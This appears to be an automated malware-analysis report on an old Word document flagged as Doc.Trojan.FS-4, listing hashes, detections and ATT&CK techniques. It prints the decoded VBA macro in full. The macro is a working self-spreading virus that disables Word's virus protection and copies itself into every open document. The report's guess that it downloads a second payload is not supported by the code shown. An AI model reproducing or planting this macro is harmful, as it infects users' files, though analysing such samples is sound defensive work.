Office (OLE) malware analysis — malicious · d4808b84f57d2845

MALICIOUS

Office (OLE)

26.0 KB Created: 1999-07-17 06:15:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: db26e2f0639ca8ac3615e0fff320841c SHA-1: f09ecea861c7efe0d6b487bde61b9cedd75654f6 SHA-256: d4808b84f57d2845eb15d4c455af6a1e667c1634ae609a98aecf04025f88bc35

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a VBA macro that executes upon opening. The macro attempts to modify the document's code, likely to obfuscate or download a secondary payload. The presence of the 'Document_Open' macro and the ClamAV detection 'Doc.Trojan.FS-4' strongly indicate malicious intent.

Heuristics 3

ClamAV: Doc.Trojan.FS-4 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.FS-4
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 714 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	714 bytes
SHA-256: `eb21ef94dc03d683c3be0f0aea2dd2fa1fa8d8fe0dad85f49112f1d7fdf020dc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Copyright (C) 1998 by FlyShadow ~^^~ - Jo Private Sub Document_Open(): Document_Close: End Sub Private Sub Document_Close(): On Error Resume Next Options.VirusProtection = 0: Application.EnableCancelKey = 0 For ι = 1 To Documents.Count With Documents(ι).VBProject.VBComponents(1).CodeModule If .Find("~^^~", 0, 0, 0, 0, 0, 0) = 0 Then .DeleteLines 1, .CountOfLines .AddFromString VBE.CodePanes(1).CodeModule.Lines(1, 11) End If: End With: Next End Sub

SHA-256: eb21ef94dc03d683c3be0f0aea2dd2fa1fa8d8fe0dad85f49112f1d7fdf020dc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Jo
Private Sub Document_Open(): Document_Close: End Sub
Private Sub Document_Close(): On Error Resume Next
Options.VirusProtection = 0: Application.EnableCancelKey = 0
For ι = 1 To Documents.Count
With Documents(ι).VBProject.VBComponents(1).CodeModule
If .Find("~^^~", 0, 0, 0, 0, 0, 0) = 0 Then
.DeleteLines 1, .CountOfLines
.AddFromString VBE.CodePanes(1).CodeModule.Lines(1, 11)
End If: End With: Next
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.